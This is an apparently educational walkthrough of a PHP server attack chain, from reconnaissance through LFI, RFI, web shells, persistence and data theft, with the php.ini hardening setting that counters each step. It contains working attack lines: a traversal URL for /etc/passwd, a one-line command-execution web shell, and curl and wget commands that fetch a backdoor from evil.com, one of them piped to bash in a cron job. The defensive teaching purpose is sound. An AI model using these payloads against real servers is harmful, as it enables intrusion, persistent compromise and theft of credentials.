This walkthrough is commonly used in cybersecurity training and penetration testing labs to understand why securing the php.ini is critical.
The goal here is defensive understanding — learning how attacks work so you can prevent them. 🔐
1. Step 1 — Reconnaissance (Finding the Target)
The attacker first identifies whether the website runs PHP.
Methods attackers use
Checking HTTP headers
Example response:
X-Powered-By: PHP/8.1
If the server exposes this header, it means:
-
PHP is installed
-
The version is known
This happens when:
expose_php = On
Why this is dangerous
Attackers can search for known vulnerabilities in that PHP version.
Example workflow:
-
Identify version
-
Search vulnerability databases
-
Try known exploits
Defense
expose_php = Off
This hides the PHP version.
2. Step 2 — Information Disclosure
Attackers intentionally trigger errors to reveal sensitive information.
Example URL:
https://site.com/index.php?id='
If the server shows errors:
Warning: mysqli_query() expects parameter 1
in /var/www/html/config.php on line 45
This reveals:
-
File path
-
Internal folder structure
-
Database queries
This happens when:
display_errors = On
Why attackers want this
They can now map the system:
/var/www/html/config.php
And locate sensitive files like:
config.php
database.php
.env
Defense
display_errors = Off
log_errors = On
Errors go to logs instead.
3. Step 3 — Local File Inclusion (LFI)
Many PHP applications load files dynamically.
Example vulnerable code:
<?php
include($_GET['page']);
?>
An attacker tries:
https://site.com/index.php?page=about.php
Then modifies it:
https://site.com/index.php?page=../../../../etc/passwd
Now the server may display:
root:x:0:0:root:/root:/bin/bash
The attacker just accessed Linux system files.
Why this works
Because PHP allows unrestricted file access.
Defense
Use:
open_basedir = /var/www/html/
Now PHP cannot access system directories.
4. Step 4 — Remote File Inclusion (RFI)
If the server allows loading remote files:
allow_url_include = On
Attackers exploit it.
Example attack:
https://site.com/index.php?page=http://evil.com/shell.txt
The server loads a remote malicious script.
Example malicious code:
<?php system($_GET['cmd']); ?>
Now the attacker can run commands:
https://site.com/index.php?page=http://evil.com/shell.txt&cmd=whoami
Result:
www-data
The attacker now has command execution.
Defense
allow_url_include = Off
allow_url_fopen = Off
5. Step 5 — Uploading a Web Shell
Many websites allow file uploads.
Example feature:
Upload profile picture
If validation is weak, attackers upload:
shell.php
Example shell:
<?php system($_GET['cmd']); ?>
Then access it:
https://site.com/uploads/shell.php?cmd=id
Server response:
uid=33(www-data)
Now the attacker has full command control.
6. Step 6 — Command Execution
If dangerous functions are enabled:
exec()
system()
shell_exec()
passthru()
Attackers can execute system commands.
Example:
https://site.com/shell.php?cmd=ls
or
https://site.com/shell.php?cmd=cat /etc/passwd
Even worse:
https://site.com/shell.php?cmd=wget http://evil.com/backdoor.sh
Now malware is installed.
Defense
Disable these functions:
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
7. Step 7 — Privilege Escalation
Once inside the server, attackers look for:
-
weak permissions
-
sudo misconfigurations
-
vulnerable software
They attempt to escalate privileges:
www-data → root
If successful, they fully control the system.
8. Step 8 — Persistence (Backdoors)
Attackers install backdoors so they can return later.
Examples:
hidden PHP shells
cron jobs
reverse shells
Example command:
crontab -e
Adding:
*/5 * * * * curl http://evil.com/backdoor.sh | bash
Now malware runs every 5 minutes.
9. Step 9 — Data Theft
After gaining control, attackers steal data.
Targets include:
-
databases
-
user credentials
-
payment data
-
API keys
Example:
cat config.php
Output might reveal:
DB_USER=root
DB_PASSWORD=secret123
Now attackers access the database.
10. Step 10 — Server Abuse
Compromised servers are often used for:
💻 crypto mining
📧 spam email campaigns
🌐 botnet attacks
💣 DDoS attacks
The website owner may not notice immediately.
Complete Attack Chain (Typical)
A typical PHP server compromise might look like this:
1. Identify PHP version
2. Trigger error messages
3. Find vulnerable file include
4. Perform LFI or RFI
5. Upload web shell
6. Execute commands
7. Escalate privileges
8. Install backdoor
9. Steal data
10. Use server for attacks
How Proper php.ini Hardening Stops This
| Attack Stage | Defense |
|---|---|
| Recon | hide PHP version |
| Information leak | disable display_errors |
| LFI | open_basedir |
| RFI | disable allow_url_include |
| Web shells | upload restrictions |
| Command execution | disable_functions |
| Session attacks | secure session settings |
| DoS | resource limits |
Final Security Lesson
Most PHP hacks happen because of misconfiguration, not the language itself.
When properly hardened:
-
PHP can be extremely secure
-
Many large platforms run on PHP safely.
Examples include:
-
WordPress
-
Drupal
-
Laravel
